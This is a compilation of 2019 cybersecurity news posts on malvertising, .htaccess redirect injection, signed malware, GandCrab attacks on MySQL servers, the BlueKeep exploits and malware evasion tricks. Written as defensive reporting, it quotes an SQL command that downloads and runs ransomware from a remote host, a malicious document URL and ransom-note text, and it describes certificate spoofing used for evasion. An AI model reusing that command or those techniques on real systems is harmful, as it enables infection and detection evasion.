Remember the malvertising campaigns in the early days where are adverts showing you are the nth visitor, and you have a prize to claim for being the coveted nth visitor on a website? Of course these days the chance of seeing a Flash-based animated advert like that, since Google Chrome itself autoblocks scam-like adverts by default as part of the Google Safe Browsing initiative, which Firefox browser also features. The demise of malvertising through adverts does not end with the anemic Flash-based variants though, as cybercriminals are now using Bitcoins (well, sort of people’s desire for it) to convince people when they visit a dodgy website controlled by them.

Imagine that a malvertising website offers its visitor a $30 worth of Bitcoin, not that huge but with enough “visits” may enable someone to afford some stuff in eBay or an Amazon gift card-level of a prize. However, this malvertising website installs keyloggers, banking trojans or ransomware which will harm the victim at a later time. Another similar but unrelated number of websites offer referral prize in Ethereum (another cryptocurrency alternative to Bitcoin), with one website claiming that successful users who can refer 1,000 visitors to the website will earn him/her $750 worth of Ethereum.

Both websites offer a download they call “Bitcoin Collector” which claims to be an easy mining program for Windows, which will provide “free Bitcoins” for the user, but instead caused the computer to mine cryptocurrency instead for the author at the expense of the user. One of the most common trojan horse of this category is one named BotCollector.exe, often comes from a .zip file downloaded from a malvertising website.

“When you execute the included BotCollector.exe, it will launch a program called ‘ – Bot’ that does not appear to do much. In reality, though, this is a Trojan that pretends to be a bitcoin generator but simply launches a malware payload. It does this by copying a file at geobaze\patch\logo.png to logo.exe and executing it (planting itself deep into the Windows operating system)”, explained Lawrence Abrams of

BotCollector.exe was previously observed to carry a different behavior, it used to be the main payload for the ransomware named “Marozka Tear”. Being unsophisticated ransomware, Marozka Tear’s author used a public free Gmail account ( in order for its victim to contact him/her for the payment of the ransom instead of having a sophisticated “shopping cart” for collecting payments. The Bleepingcomputer team stopped the ransomware from being profitable with their release of a free decryptor program that reverses the encryption of user files without paying Marozka Tear’s author.

At the time of this writing, the two hidden payloads of the new variant of BotCollector that have not yet fully dissected by the BleepingComputer team. But initial checks show it can be compared to a full-blown espionage-type of malware that can record keystrokes, take screenshots, capture browser history, sends any user files to its author and even the capability to copy the information of a crypto wallet.

Also, Read:

Hackers Steal Around $41 Million in Bitcoin from Binance

South Korean Bitcoin Exchange Bithumb Hacked

Hacker Stole 200+ Bitcoin from Electrum Wallet

Is Bitcoin Just A Bubble That Will Burst In 2019

Using BitCoins: The Basics

The post Bitcoin Rewards As Lures? Tale Of The New Generation Malvertising appeared first on .

Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects

Security researchers are monitoring a new hacking campaign aimed at Joomla and WordPress websites, attackers used .htaccess injector for malicious redirect.

Researchers at Sucuri are warning Joomla and WordPress websites admins of malicious hypertext access (.htaccess) injector found on a client website. The website was used by attackers to redirect traffic to advertising sites that attempted to deliver malware.

“During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website. ” reads the report.

.htaccess files are configuration files for web servers running the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features. The features include the redirect functionality, content password protection or image hot link prevention.

Sucuri spotted threat actors abusing the URL redirect function of the .htaccess file to redirect visitors of compromised websites to phishing sites, sites delivering malware, or simply to generate impressions.

At the time is not clear how attackers gain access to the Joomla and WordPress websites, we only know that they inject the malicious code onto some of the website’s index.php files.

“Below is the code within the ./modules/mod_widgetread_twitt/ index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:

htaccess redirect

“This code is searching for an .htaccess file. If found, this code will place malicious redirects in the file immediately after “# BEGIN WORDPRESS”.” continues the report.

A warning message from endpoint antivirus software when users try to visit malicious site redirected by Joomla and WordPress sites.

This .php code also searches for more files and folders, trying to search nested folders.

It’s not uncommon to see hackers targeting websites through .htacccess file, including, in October 2018 a security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, in older versions of the jQuery File Upload plugin since 2010. Attackers exploited the issue to carry out several malicious activities, including defacement, exfiltration, and malware infection.

alled jQuery File Upload placed 7,800 different software applications at potential risk for compromise and remote code-execution.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a director) and to prevent users from overriding security features that were configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

“While the majority of web applications make use of redirects, these features are also commonly used by bad actors to generate advertising impressions, send unsuspecting site visitors to phishing sites, or other malicious web pages.” concludes Sucuri.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – .htaccess, hacking)

The post Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects appeared first on Security Affairs.

CVE-2019-11815: Experts discovered a privilege escalation vulnerability in the Linux Kernel

Red Hat engineers and experts discovered a memory corruption vulnerability in Linux kernel, which is basically a flaw while implementation of RDS (Remote desktop Protocol) over TCP. This flaw has affected Red Hat, Ubuntu, Debian and SUSE and security advisories have been issued for all. This flaw could enable an…

Sectigo says that most of certificates reported by Chronicle analysis were already revoked

According to Sectigo, most of the certificates used to sign the malware submitted to VirusTotal and issued by the company were expired and were already revoked.

This week experts at Chronicle published a study on signed malware registered on VirusTotal that states that most of the digital certificates used to sign malware samples found on VirusTotal in 2018 have been issued by the Certificate Authority (CA) Comodo CA (aka Sectigo).

Chronicle’s security researchers have analyzed submissions May 7, 2018, and May 7, 2019 discovering that out of a total of 3,815 signed malware samples, 1,775 were signed using a digital certificate issued by Comodo RSA Code Signing CA. 


Experts from Sectigo analyzed the Chronicle’s findings and provided their response. According to Sectigo, most of the certificates used to sign the malware submitted to VirusTotal and issued by the company were expired and were already revoked. The CA also states that many of the certificates analyzed by Chronicle were duplicates, only 127 of them were active and now revoked by the company. Duplicates are certificates that match others that already have been logged in a different category. Duplicates can cause multiple uses of the same certificate or multiple reports of the same malware application.

Below the data provided by Sectigo:

  • Duplicate: 1660
  • Expired: 70
  • Previously revoked: 126
  • In process: 25
  • Active (now revoked): 127

“Unfortunately, recent press reports suggest the incorrect conclusion that Chronicle reported nearly 2000 such certificates for Comodo / Sectigo. Since this story ran, we have investigated all of the certificates attributed to Comodo / Sectigo. More than 90% of these were expired, previously revoked, or duplicate reports.” reads the post published by Sectigo.

The CA confirmed that is still investigating 25 certificates that labeled with “in process” status.

“These reported certificates did not match our records of Code Signing certificates from Comodo / Sectigo during our investigation. We are continuing to investigate these certificates.” reads the CA.

Sectigo encourages Chronicle or other researchers to report any misuse of its public certificates at:

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – digital certificates, CA)

The post Sectigo says that most of certificates reported by Chronicle analysis were already revoked appeared first on Security Affairs.

Security Affairs newsletter Round 215 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Dutch intelligence investigate alleged Huawei ‘backdoor
Salesforce faced one of its biggest service disruption of ever
Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk
Amnesty International filed a lawsuit against Israeli surveillance firm NSO
Chronicle experts spotted a Linux variant of the Winnti backdoor
Data belonging to Instagram influencers and celebrities exposed online
Defiant Tech firm who operated LeakedSource pleads guilty
Google will block Huawei from using Android and its services
Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS
After latest Microsoft Windows updates some PCs running Sophos AV not boot
Emsisoft released a free Decrypter for JSWorm 2.0
Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones
MuddyWater BlackWater campaign used new anti-detection techniques
US Commerce Department delays Huawei ban for 90 Days
ActiveX Controls in South Korean websites are affected by critical flaws
Emsisoft released a free Decrypter for the GetCrypt ransomware
G Suite users passwords stored in plain-text for more than 14 years
SandboxEscaper is back with a new Windows Zero-Day in Task Scheduler
The Satan Ransomware adds new exploits to its arsenal
Anonymous and LulzSec target the Italian Police and doctors
Playing Cat and Mouse: Three Techniques Abused to Avoid Detection
PoC Exploits for CVE-2019-0708 wormable Windows flaw released online
SandboxEscaper disclosed 3 Microsoft zero-day flaws in 24 hours
Tor Browser for Android is available through the Play Store
UK provided evidence to 16 NATO allies of Russia hacking campaigns
Chronicles study reveals CAs that issued most certificates to sign malware samples on VirusTotal
Facebook says it took down 2.19 billion accounts in Q1 2019
How Hackers Access Direct Deposit Paycheck — And What to Do About It
US DoJs superseding indictment charges Assange with violating Espionage Act
0patch issued a micropatch to address the BlueKeep flaw in always-on servers
GitHub introduces new tools and security features to secure code
Hackers target MySQL databases to deliver the GandCrab ransomware
Snapchat staff used internal tools to spy on users

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 215 – News of the week appeared first on Security Affairs.

Hackers target MySQL databases to deliver the GandCrab ransomware

Security experts at Sophos have detected a wave of attacks targeting Windows servers that are running MySQL databases with the intent of delivering the GandCrab ransomware

Sophos researchers have observed a wave of attacks targeting Windows servers that are running MySQL databases, threat actors aim at delivering the GandCrab ransomware.

This is the first time the company sees hackers targeting Windows servers running instances MySQL databases to infect them with ransomware.

The experts discovered the attacks because they hit one of the company’s honeypots that emulates MySQL listening on the default TCP port 3306.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the “set” command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server’s plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:


The command to invoke the xpdl3 function is:

select xpdl3('hxxp://[.]exe','c:\\isetup.exe') 

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.

According to Sophos, at least one Chinese threat actor is currently carrying out such kind of attacks, scanning the internet for Windows servers that are running MySQL databases.

“This particular attack transpired over just a few seconds at about midday, local time, on Sunday, May 19th.” reads the analysis published by Sophos.

“But the URL where the file originated bears some scrutiny. It pointed to an open directory on a web server running server software called HFS, which is a Windows-based web server in the form of a single application.”

“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”

The analysis of the server allowed the experts to determine the number of times the ransomware was downloaded.

The GandCrab sample that targeted the honeypot was downloaded more than 500 times. Unfortunately, the sample was not the only one, counted together, experts estimated that there have been nearly 800 downloads in the five days, as well as more than 2300 downloads of the other GandCrab sample in the open directory.

“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file,” continues the analysis.

“Counted together, there has been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory.

The researchers pointed out that this isn’t a massive or widespread attack, anyway it represents a serious risk to MySQL server admins that exposed their installs online.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – MySQL databases, GandCrab)

The post Hackers target MySQL databases to deliver the GandCrab ransomware appeared first on Security Affairs.

Banking Trojan Infections Dominated In Q1 2019

Kaspersky Lab, the research arm of Kaspersky, an antivirus vendor has revealed that the first quarter of 2019 saw the double growth of banking trojan cases globally compared to the last quarter of 2018. Cybercriminals have switched their focus on banking trojan after the shutdown of the very popular Coinhive cryptojacking service last March 2019. With the focus towards profit, ransomware infections are slowly declining while operating system mitigations are lessening cryptocurrency malware’s infection vectors.

“In Q1 2019, Kaspersky Lab detected a 58% increase in modifications of banking Trojan families, used in attacks on 312,235 unique users. Banking Trojans grew not only in the number of different samples detected, but their share of the threat landscape increased as well. In Q4 2018, mobile banking Trojans accounted for 1.85% of all mobile malware; in Q1 2019, their share reached 3.24%,” explained Victor Chebyshev, Kaspersky’s Lead of Research Development team.

Banking trojans of 2019 are highly modular, with new features added on-the-fly by their respective authors. Kaspersky detected that for the first quarter of 2019 alone, 29,841 variants of banking trojans were discovered. That is a sizable increase from just 18,501 discovered variants in the 4th quarter of 2018.

“As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected,” added Chebyshev.

Kaspersky is expecting that the mobile platform is the segment that will be mostly hit. This is given because users today tend to perform more computing with their mobile device compared to a full fledged computer.

“The rapid rise of mobile financial malware is a troubling sign, especially since we see how criminals are perfecting their distribution mechanisms. For example, a recent tendency is to hide the banking Trojan in a dropper – the shell that is supposed to fly to the device under the security radar, releasing the malicious part only upon arrival,” concluded Chebyshev.

Also, Read:

The All-New Kronos Banking Trojan Discovered

Multimedia Editing Software Hacked to Spread Banking Trojan

Redaman Banking Trojan of 2015 Resurrects, Targets Russian Email Users

How Protect Your Android Device From The Mobile Banking Trojan

The post Banking Trojan Infections Dominated In Q1 2019 appeared first on .

Cyber News Rundown: Banking Trojan Closes Ohio Schools

Reading Time: ~2 min.

Banking Trojan Shuts Down Ohio School District

After the discovery of the banking Trojan known as Trickbot, an Ohio school district was forced to cancel school since they were unable to fully disinfect the networks before classes resumed the following Monday. Preliminary reports have concluded that no students were responsible for the attack, as it appears to have started its data-gathering on a computer belonging to the district treasurer’s office. In order for classes to resume normally, the IT staff for the district had to re-format nearly 1,000 affected computers. 

GetCrypt Spreading Through RIG Exploit Kits

Another ransomware variant, GetCrypt, has been spotted in the wild that spreads itself across systems by redirecting visitors to a compromised website to a separate page hosting an exploit kit. After checking for several Eastern European languages, the ransomware begins encrypting all files on the system and displays a standard ransom note. In addition to removing all available shadow copies from the computer, GetCrypt also appends all encrypted files with a randomized, four-character string based on the CPUID of the device itself.

Google Assistant Logs All Online Purchases

It was recently discovered that Google’s Assistant, released last year, keeps a log of all online purchases for which a receipt was sent to the user’s Gmail account. The “Payments” page on a user’s Google account shows transactions, flight and hotel reservations, and other purchases made up to several years prior, even showing the cost, date, and time of the purchase.

Forbes Joins List of Magecart Victims

It was revealed late last week that Forbes had fallen victim to a Magecart attack possibly affecting anyone who made a purchase on the site during that time. Fortunately, the researcher who discovered the attack quickly notified both Forbes and the domain owner, resulting in a swift removal of the malicious payment card skimmer from the highly-trafficked site. It’s likely that Forbes became a victim after another vendor in their supply chain was compromised.

Australian IT Contractor Arrested for Cryptomining

An IT contractor working in Australia was arrested after being caught running cryptomining software on government-owned computers, which netted him over $9,000 in cryptocurrency. The charges encompass misuse of government systems by making modifications to critical functions and security measures for personal gain while in a position of trust. By making these changes, this contractor could have exposed a much larger portion of the network to malicious actors who take advantage of misconfigured settings to access company data.

The post Cyber News Rundown: Banking Trojan Closes Ohio Schools appeared first on Webroot Blog.

Chronicle’s study reveals CAs that issued most certificates to sign malware samples on VirusTotal

Most of the digital certificates used to sign malware samples found on VirusTotal have been issued by the Certificate Authority (CA) Comodo CA.

Most of the digital certificates used to sign malware samples found on VirusTotal in 2018 have been issued by the Certificate Authority (CA) Comodo CA (aka Sectigo).

Chronicle’s security researchers have analyzed submissions May 7, 2018, and May 7, 2019 discovering that out of a total of 3,815 signed malware samples, 1,775 were signed using a digital certificate issued by Comodo RSA Code Signing CA. 

Vxers use to sign the code of their malware to avoid detection of some security systems.

Malware authors are taking advantage of this inherited trust model to purchase certificates directly or via resellers and their signed code is considered reliable until the ravocation of the certificate by the CA.

At the moment, the researchers note, the only real tool to combat certificate abuse is the revocation of that certificate, a process through which the CA says the certificate is no longer trustworthy, and which introduces a delay in which the signed malware may be considered “trusted”.

“The chain of trust is relatively straight-forward: certificates are signed (issued) by trusted certificate authorities (CAs) , which have the backing of a trusted parent CA.” reads the study published by Chronicle. “This inherited trust model is taken advantage of by malware authors who purchase certificates directly or via resellers. Whether purchased directly or indirectly, due diligence into customers appears to be lacking.”

The investigation conducted by Chronicle experts focused on signed Windows PE Executable files uploaded to VirusTotal. The researchers filtered out a large number of samples, all the samples with less than 15 aggregate detections were excluded along with grayware files.

Chronicle calculated the distinct number of samples signed with digital certificates issued by the different CA.

Comodo issued the largest number of signed samples, at 1,775, with Thawte at 509, VeriSign at 261, Sectigo (formerly Comodo) at 182, Symantec at 131, and DigiCert at 118.

“CAs who signed certificates of 100 or more malware samples account for nearly 78%of signed samples uploaded to VirusTotal.” continues Chronicle.

digital certificates signed malware

Experts explained that at the time of the analysis (May 8th, 2019), 21% of samples had their certificates revoked, a circumstance that confirms that CAs are taking some action to contrast the abuses. It is important to consider that the revocation of a certificate is reflected in the VirusTotal dataset after the signed sample has been rescanned after the revocation request by the responsible CA.

“While malware abusing trust is not a new phenomenon, the popular trend of financially motivated threat actors buying code signing certificates illuminates the inherent flaws of trust based security. Signed payloads are no longer solely within the domain of nation-state threat actors stealing code signing certificates from victims; they are readily accessible to operators of crime focused malware.” concludes the expert. “The impact is amplified by the scope and scale of typical crimeware campaigns. Expect to see signed malware reported more frequently.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – malware, digital certificates)

The post Chronicle’s study reveals CAs that issued most certificates to sign malware samples on VirusTotal appeared first on Security Affairs.

PoC Exploits for CVE-2019-0708 wormable Windows flaw released online

Several security experts have developed PoC exploits for wormable Windows RDS flaw tracked as CVE-2019-0708 and dubbed BlueKeep.

Experts have developed several proof-of-concept (PoC) exploits for the recently patched Windows Remote Desktop Services (RDS) vulnerability tracked as CVE-2019-0708 and dubbed BlueKeep.

One of the PoC exploits could be used for remote code execution on vulnerable systems.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attack.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that it can be exploited by an unauthenticated attacker by connecting to the targeted system via the RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

The vulnerability doesn’t affect Windows 8 and Windows 10, anyway previous versions are exposed to the risk of cyber attacks.

Microsoft also advised Windows Server users to block TCP port 3389 and enable Network Level Authentication to prevent any unauthenticated attacker from exploiting this vulnerability.

The issue poses a serious risk to organizations and industrial environments due to the presence of a large number of systems that could be reached via RDS.

Not all the exploits publicly released by the experts are fully working, come of them are able to trigger the vulnerability by don’t cause abny problem

Experts at the SANS Institute observed two partial exploits that are publicly available.

“Several security vendors stated publicly that they developed exploits internally that will at least trigger a denial of service condition (blue screen). Currently, there are at least two public partial exploits.” reads the blog post published by the SANS Institute, “One triggers the “vulnerable path” without triggering a blue screen or causing any other damage. It can be adjusted to play with the “channel” parameter to create normal and exploit traffic. The second one also triggers the vulnerability without any intended ill effect. The second exploit has been made available in the form of a stand-alone vulnerability scanner.”

Anyway, some researchers have created exploits to remotely execute code on vulnerable systems.

CVE-2019-0708 exploit code

Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges.

Researchers at McAfee developed a PoC exploit that could be exploited to get remote code execution.

Experts believe that it just a matter of time before we will see threat actors exploiting the flaw in the wild.

“Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator,” reads the post published by ESET.

BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2019-0708 )

The post PoC Exploits for CVE-2019-0708 wormable Windows flaw released online appeared first on Security Affairs.

One year later: The VPNFilter catastrophe that wasn’t

One year ago, Cisco Talos first disclosed the existence of VPNFilter on May 23, 2018. The malware made headlines across the globe, as it was a sophisticated piece of malware developed by a nation state, infecting half a million devices, and poised to cause havoc. Yet the attack was averted. This is the story of VPNFilter, and the catastrophe that was averted.


The post One year later: The VPNFilter catastrophe that wasn’t appeared first on Cisco Blog.

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

The experts at Yoroi-Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.


During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Threatcve-2017-0199 document
Brief DescriptionDocument Dropper exploiting cve-2017-0199
Ssdeep96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Brief DescriptionEmotet payload
Ssdeep1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Brief DescriptionEmotet payload signed using Symantec cert
Ssdeep1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level


The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that a direct spotlight on few of these tricks would push the eternal cat and mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – malware, avoid detection)

The post Playing Cat and Mouse: Three Techniques Abused to Avoid Detection appeared first on Security Affairs.

Cybercriminals continue to evolve the sophistication of their attack methods

Cybercriminals continue to evolve the sophistication of their attack methods, from tailored ransomware and custom coding for some attacks, to living-off-the-land (LoTL) or sharing infrastructure to maximize their opportunities, according to the Fortinet latest report. Pre- and post-compromise traffic Research to see if threat actors carry out phases of their attacks on different days of the week demonstrates that cybercriminals are always looking to maximize opportunity to their benefit. When comparing Web filtering volume for … More

The post Cybercriminals continue to evolve the sophistication of their attack methods appeared first on Help Net Security.

Emsisoft released a free Decrypter for the GetCrypt ransomware

For the second time in a few days, experts at Emsisoft released a free decrypter, this time to help victims of the GetCrypt ransomware.

Security experts at Emsisoft released a new decrypted in a few days, it could be used for free by victims of the GetCrypt ransomware to decrypt their files encrypted by the malware.

The GetCrypt ransomware is served through the RIG exploit kit, it leveragesSalsa20 and RSA-4096 to encrypt the victims’ files.

GetCrypt is a ransomware spread by the RIG exploit kit, and encrypts victim’s files using Salsa20 and RSA-4096. It appends a random 4-character extension to files that is unique to the victim.” reads the post published by Emsisoft.

The ransomware drops on the infected systems the file “# DECRYPT MY FILES #.txt” containing the follwing ransom note:

“Attention! Your computer has been attacked by virus-encoder! All your files are now encrypted using cryptographycalli strong aslgorithm. Without the original key recovery is impossible.

TO GET YOUR DECODER AND THE ORIGINAL KEY TO DECRYPT YOUR FILES YOU NEED TO EMAIL US AT: GETCRYPT@COCK.LI It is in your interest to respond as soon as possible to ensure the restoration of your files. P.S only in case you do not recive a response from the first email address within 48 hours, [redacted]. It is in your interest to respond as soon as possible to ensure the restoration of your files. 

P.S only in case you do not recive a response from the first email address within 48 hours,

Victims can download the decrypter for free at the following URL:

In order to decrypt the files, victims have to provide an encrypted version of a file and the original of the same file.

GetCrypt ransomware

A few days ago, Emsinsoft released a free Decrypter for JSWorm 2.0

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – GetCrypt ransomware, cybercrime)

The post Emsisoft released a free Decrypter for the GetCrypt ransomware appeared first on Security Affairs.

Automated Malware Analysis in the Cloud: An Introduction

Cybercriminals execute malware attacks using different attack vectors and using different methods. The number of malware strains is increasing in an unprecedented manner and hence malware analysis today is not an easy job. In the present context, automated malware analysis is a necessity. Let’s discuss today the different aspects of automated malware analysis in the cloud.

Though there are millions of malware samples being distributed around the world today, only a few are new ones. Majority of the malware that we find are simple derivations of existing known malware. New malware samples could prove too complex for analysis using cloud automated malware services. By detecting a sandbox, debugger or a virtual environment, any new, complex malware could detect automated malware analysis environment and then could execute wild programs.

Well, let’s come back to automated malware analysis in the cloud. There are many automated malware analysis services available on the internet, some of which are free. There are malware analysis tools provided by Comodo, Malwr, Anubis, Hybrid Analysis, Threat Expert, Threat Track etc. A notable thing is that despite such services automating malware analysis to a great extent, the analyst needs to have a deep understanding regarding what he is doing and what he is looking for. This would help him understand the output that’s provided by the malware analysis service.

Let’s now discuss the analysis process.

We should begin by attempting to determine if the binary sample is malicious. This can be done by using VirusTotal. To be noted is the fact that if the binary sample is quite new, there are chances that it might not get detected as malicious even if it is malicious, especially if antivirus companies haven’t updated their signatures yet. Well, if the sample is detected as malicious, we’ll get a list of the antivirus solutions that have detected it as malicious, plus the name of the malware and details regarding the time when the signature was updated last. We should next try to get more information about the analyzed malicious file, especially as too what it does.

Cloud automated malware analysis solutions can help gain information about the binary sample that has been detected as malicious. An analysis of the malware on the tool could yield a detailed report (mostly in HTML, PDF, XML etc); this report might have lots of details including details about the DLLs used by the malware sample, summary of files and directories accessed by the binary sample, list of all strings in a binary, details regarding whether it connects back to the C&C server to fetch and execute commands, data pertaining to whether the binary sample modifies certain registry keys to achieve persistence on the infected system etc.

Thus, by going for automated malware analysis, we can detect malware and gain sufficient information about malicious files, which would help us combat them in better and more effective ways.

